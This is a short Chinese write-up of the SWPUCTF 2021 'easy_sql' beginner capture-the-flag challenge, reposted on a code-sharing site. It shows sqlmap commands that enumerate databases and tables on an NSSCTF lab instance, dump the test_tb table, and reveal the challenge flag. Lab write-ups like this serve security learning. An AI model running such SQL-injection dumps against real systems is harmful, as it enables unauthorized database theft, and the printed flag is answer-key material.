[SWPUCTF 2021 新生赛]easy_sql的write up

15 阅读 0 评论 0 点赞

开启NSSCTF靶场，在浏览器中访问链接，看到让我们输入点什么还有标签页名字提示：

"参数是wllm"

直接/?wllm=1访问一下：

这里就直接用sqlmap直接爆破了：

查看数据库有哪些：

python sqlmap.py -u "http://node4.anna.nssctf.cn:28961/?wllm=1" --dbs

看到test_db就是这个数据库，其他数据库都是sql数据库的必要四个数据库，接下来就查看test_db数据库的表有哪些

查看test_db数据库的表名有哪些：

python sqlmap.py -u "http://node4.anna.nssctf.cn:28961/?wllm=1" -D test_db --tables

一眼就看出test_tb这个表很关键，接下来就查看一下这个test_tb表的信息

查看test_db数据库的test_tb表的所有数据：

python sqlmap.py -u "http://node4.anna.nssctf.cn:28961/?wllm=1" -D test_db -T test_tb --dump

很轻松的看出test_db表有flag列，flag列的内容就是题目所求的flag：

NSSCTF{05010966-5970-49bc-bdfd-b244ca7756cb}

本站资源均来自互联网，仅供研究学习，禁止违法使用和商用，产生法律纠纷本站概不负责！如果侵犯了您的权益请与我们联系！

转载请注明出处：免费源码网-免费的源码资源网站 » [SWPUCTF 2021 新生赛]easy_sql的write up

点赞(0) 打赏

本文分类：文章资讯
本文标签：[SWPUCTF 2021 新生赛]easy_sql的write up
浏览次数：15 次浏览
本文链接：https://freeymw.com/article/34777.html

上一篇 > Linux安装部署数据库：MongoDB
下一篇 > LLaMA Factory 核心原理讲解

评论列表共有 0 条评论

暂无评论

发表评论取消回复

微信公众账号

微信扫一扫加关注

发表
评论返回
顶部